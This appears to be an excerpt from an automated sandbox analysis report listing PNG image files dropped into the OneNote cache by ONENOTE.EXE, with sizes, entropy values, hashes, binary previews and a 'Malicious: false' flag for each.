Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000024.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000025.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000026.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000027.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000028.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000029.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002A.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002B.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002C.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002D.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002E.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002F.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002G.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002H.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
